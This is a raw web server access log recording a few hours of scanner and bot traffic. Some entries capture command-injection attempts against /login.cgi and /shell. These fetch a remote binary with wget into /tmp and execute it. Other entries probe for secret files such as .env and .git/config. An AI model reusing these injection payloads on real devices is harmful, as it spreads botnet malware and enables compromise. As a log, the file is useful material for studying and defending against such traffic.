183.136.225.32 - - [05/Mar/2023:03:29:42 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:03:29:43 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
92.118.39.82 - - [05/Mar/2023:03:31:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [05/Mar/2023:03:31:22 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
185.246.220.98 - - [05/Mar/2023:03:32:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
185.246.220.98 - - [05/Mar/2023:03:32:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
92.118.39.82 - - [05/Mar/2023:03:33:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [05/Mar/2023:03:33:01 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
138.255.12.184 - - [05/Mar/2023:03:34:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.246.220.98 - - [05/Mar/2023:03:34:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
80.80.158.37 - - [05/Mar/2023:03:35:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "HELP" 501 319 "-" "-"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800066) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /s/8383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:25 +0100] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
projectupdate.scan.leakix.org - - [05/Mar/2023:03:41:25 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
164.92.192.25 - - [05/Mar/2023:03:41:26 +0100] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
193.32.162.159 - - [05/Mar/2023:03:41:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.148.11.222 - - [05/Mar/2023:03:41:45 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.55.112.20 - - [05/Mar/2023:03:41:46 +0100] "GET /login.cgi HTTP/1.1" 404 314 "212.91.246.83" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
45.55.112.20 - - [05/Mar/2023:03:41:46 +0100] "GET / HTTP/1.1" 200 1229 "212.91.246.83" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
134.122.133.35 - - [05/Mar/2023:03:44:17 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.35 - - [05/Mar/2023:03:44:19 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.35 - - [05/Mar/2023:03:44:19 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.35 - - [05/Mar/2023:03:44:20 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.35 - - [05/Mar/2023:03:44:21 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.35 - - [05/Mar/2023:03:44:22 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.35 - - [05/Mar/2023:03:44:27 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.97 - - [05/Mar/2023:03:44:29 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.97 - - [05/Mar/2023:03:44:30 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
134.122.133.97 - - [05/Mar/2023:03:44:30 +0100] "GET /vod-178809.html HTTP/1.1" 404 318 "/vod-178809.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
193.32.162.159 - - [05/Mar/2023:03:44:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.81.233.254 - - [05/Mar/2023:03:49:18 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
45.81.233.254 - - [05/Mar/2023:03:50:15 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
154.160.30.26 - - [05/Mar/2023:03:51:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.81.233.254 - - [05/Mar/2023:03:51:57 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
45.81.233.254 - - [05/Mar/2023:03:53:50 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
45.81.233.254 - - [05/Mar/2023:03:57:44 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
193.32.162.159 - - [05/Mar/2023:03:58:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
13.40.149.66 - - [05/Mar/2023:03:59:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:00:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:00:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:00:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
45.81.233.254 - - [05/Mar/2023:04:00:46 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
162.142.125.121 - - [05/Mar/2023:04:01:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.121 - - [05/Mar/2023:04:01:40 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.121 - - [05/Mar/2023:04:01:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
13.40.149.66 - - [05/Mar/2023:04:02:31 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:03:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:03:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:03:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:05:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:06:56 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:07:06 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:07:08 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.246.220.98 - - [05/Mar/2023:04:08:25 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
125.106.234.203 - - [05/Mar/2023:04:09:15 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://85.217.144.59/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
5.190.176.78 - - [05/Mar/2023:04:19:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
94.34.146.227 - - [05/Mar/2023:04:22:23 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.32.162.159 - - [05/Mar/2023:04:22:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
8.18.50.101 - - [05/Mar/2023:04:24:50 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
13.40.149.66 - - [05/Mar/2023:04:27:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
13.40.149.66 - - [05/Mar/2023:04:30:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
13.40.149.66 - - [05/Mar/2023:04:32:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
13.40.149.66 - - [05/Mar/2023:04:33:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.237 - - [05/Mar/2023:04:34:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
185.246.220.98 - - [05/Mar/2023:04:34:27 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
80.72.77.81 - - [05/Mar/2023:04:35:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
64.62.197.231 - - [05/Mar/2023:04:35:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
64.62.197.240 - - [05/Mar/2023:04:36:24 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
13.40.149.66 - - [05/Mar/2023:04:38:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
51.254.59.113 - - [05/Mar/2023:04:40:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
13.40.149.66 - - [05/Mar/2023:04:40:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
13.40.149.66 - - [05/Mar/2023:04:43:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
13.40.149.66 - - [05/Mar/2023:04:43:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
185.246.220.98 - - [05/Mar/2023:04:47:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
193.32.162.159 - - [05/Mar/2023:04:48:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
111.118.40.97 - - [05/Mar/2023:04:51:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
13.40.149.66 - - [05/Mar/2023:04:52:25 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:53:11 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:53:34 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:54:44 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
13.40.149.66 - - [05/Mar/2023:04:55:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
193.32.162.159 - - [05/Mar/2023:04:55:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
8.18.50.101 - - [05/Mar/2023:04:56:36 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
185.246.220.98 - - [05/Mar/2023:04:57:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
183.136.225.32 - - [05/Mar/2023:05:04:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
193.32.162.159 - - [05/Mar/2023:05:06:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.246.220.98 - - [05/Mar/2023:05:07:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
183.136.225.32 - - [05/Mar/2023:05:09:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:05:09:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:05:09:43 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
193.32.162.159 - - [05/Mar/2023:05:10:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
8.18.50.101 - - [05/Mar/2023:05:11:50 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
193.32.162.159 - - [05/Mar/2023:05:14:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [05/Mar/2023:05:20:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.141.6.170 - - [05/Mar/2023:05:22:00 +0100] "GET /crm/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [05/Mar/2023:05:22:00 +0100] "POST /crm HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [05/Mar/2023:05:22:06 +0100] "GET /crm/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [05/Mar/2023:05:22:07 +0100] "POST /crm HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [05/Mar/2023:05:24:06 +0100] "GET /crm/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [05/Mar/2023:05:24:06 +0100] "POST /crm HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
125.106.234.203 - - [05/Mar/2023:05:25:35 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://85.217.144.59/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
109.237.97.180 - - [05/Mar/2023:05:37:30 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [05/Mar/2023:05:37:31 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
111.118.40.97 - - [05/Mar/2023:05:39:45 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
110.80.136.230 - - [05/Mar/2023:05:42:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
8.18.50.101 - - [05/Mar/2023:05:43:56 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
193.32.162.159 - - [05/Mar/2023:05:44:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
122.201.25.95 - - [05/Mar/2023:05:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
89.248.174.154 - - [05/Mar/2023:05:46:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
161.35.157.58 - - [05/Mar/2023:05:48:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
47.100.179.13 - - [05/Mar/2023:05:50:25 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
89.248.174.154 - - [05/Mar/2023:05:54:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
144.217.135.207 - - [05/Mar/2023:05:56:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
144.217.135.207 - - [05/Mar/2023:05:56:19 +0100] "GET /robots.txt HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
144.217.135.207 - - [05/Mar/2023:05:56:19 +0100] "GET /sitemap.xml HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
144.217.135.207 - - [05/Mar/2023:05:56:19 +0100] "GET /ads.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
144.217.135.207 - - [05/Mar/2023:05:56:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; SM-G981B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36"
149.56.150.2 - - [05/Mar/2023:05:56:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
89.248.174.154 - - [05/Mar/2023:05:59:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
89.248.174.154 - - [05/Mar/2023:06:00:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
167.248.133.46 - - [05/Mar/2023:06:07:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.46 - - [05/Mar/2023:06:07:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [05/Mar/2023:06:07:31 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.46 - - [05/Mar/2023:06:07:31 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.246.220.98 - - [05/Mar/2023:06:11:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
77.78.204.44 - - [05/Mar/2023:06:11:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.246.220.98 - - [05/Mar/2023:06:13:36 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
89.248.174.154 - - [05/Mar/2023:06:15:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
125.47.219.82 - - [05/Mar/2023:06:15:50 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
138.197.179.241 - - [05/Mar/2023:06:19:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
138.197.179.241 - - [05/Mar/2023:06:19:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
138.197.179.241 - - [05/Mar/2023:06:19:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.197.179.241 - - [05/Mar/2023:06:19:54 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
89.248.174.154 - - [05/Mar/2023:06:21:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
89.248.174.154 - - [05/Mar/2023:06:21:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
